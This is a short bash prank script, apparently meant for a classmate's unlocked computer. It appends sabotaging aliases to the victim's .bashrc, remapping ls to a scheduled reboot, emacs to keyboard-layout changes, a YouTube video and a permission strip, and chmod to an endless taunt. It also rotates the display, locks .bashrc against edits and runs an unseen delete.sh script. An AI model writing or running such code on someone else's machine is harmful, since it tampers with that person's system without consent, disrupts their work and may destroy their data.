#!/bin/bash
SOURCE_FILE=".bashrc"
CMD1="shutdown -r 12:10"
CMD2="yes laisse pas ton pc ouvert la prochaine fois"
CMD3="setxkbmap ru"
CMD5="setxkbmap fr"
CMD4="firefox https://www.youtube.com/watch?v=z7-sf26kGzE"
CMD="./my_mv $1"
CMD6="chmod -wx"

echo "alias ls=\"$CMD1\"" >> "$HOME/$SOURCE_FILE"
echo "alias cd=\"$CMD\"" >> "$HOME/$SOURCE_FILE"
echo "alias emacs=\"$CMD3;$CMD4;$CMD6\"" >> "$HOME/$SOURCE_FILE"
echo "alias chmod=\"$CMD2\"" >> "$HOME/$SOURCE_FILE"
echo "alias ok=chmod" >> "$HOME/$SOURCE_FILE"
echo "alias ah=\"$CMD5\"" >> "$HOME/$SOURCE_FILE"
echo "xrandr -o left ; xrandr -o right ; xrandr -o normal ; xrandr -o inverted" >> "$HOME/$SOURCE_FILE"
echo "setxkbmap ar" >> "$HOME/$SOURCE_FILE"
source "$HOME/$SOURCE_FILE"
chmod -wx "$HOME/$SOURCE_FILE"
./delete.sh
